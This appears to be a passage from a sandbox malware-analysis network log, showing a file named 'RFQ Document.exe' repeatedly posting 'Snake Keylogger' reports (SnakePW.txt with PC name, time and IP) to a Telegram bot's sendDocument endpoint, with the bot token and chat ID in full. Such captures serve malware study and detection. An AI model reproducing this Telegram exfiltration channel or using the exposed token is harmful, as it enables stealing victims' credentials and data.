                                            2021-09-28 05:58:59 UTC208INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12717,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808739,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            131192.168.2.449930149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:59 UTC209OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d917675e
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:59 UTC209OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 31 37 36 37 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d917675eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:59 UTC210INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:59 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:59 UTC210INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12718,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808739,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            132192.168.2.449931149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:59 UTC211OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d93d8c91
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:59 UTC211OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 33 64 38 63 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d93d8c91Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:00 UTC211INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:00 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:00 UTC212INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12719,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            133192.168.2.449932149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:00 UTC212OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d95563e5
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:00 UTC212OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 35 35 36 33 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d95563e5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:00 UTC213INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:00 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:00 UTC213INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12720,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            134192.168.2.449933149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:00 UTC214OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d972014a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:00 UTC214OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 37 32 30 31 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d972014aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:00 UTC214INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:00 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:00 UTC215INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12721,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            135192.168.2.449934149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:00 UTC215OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d990fe2e
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:00 UTC216OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 39 30 66 65 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d990fe2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:00 UTC216INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:00 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:00 UTC216INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12722,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            136192.168.2.449935149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:00 UTC217OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d9affcf6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:00 UTC217OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 61 66 66 63 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d9affcf6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:00 UTC218INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:00 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:00 UTC218INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12723,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            137192.168.2.449936149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:00 UTC219OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d9cefbed
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:00 UTC219OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 63 65 66 62 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d9cefbedContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:01 UTC219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:01 UTC220INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64
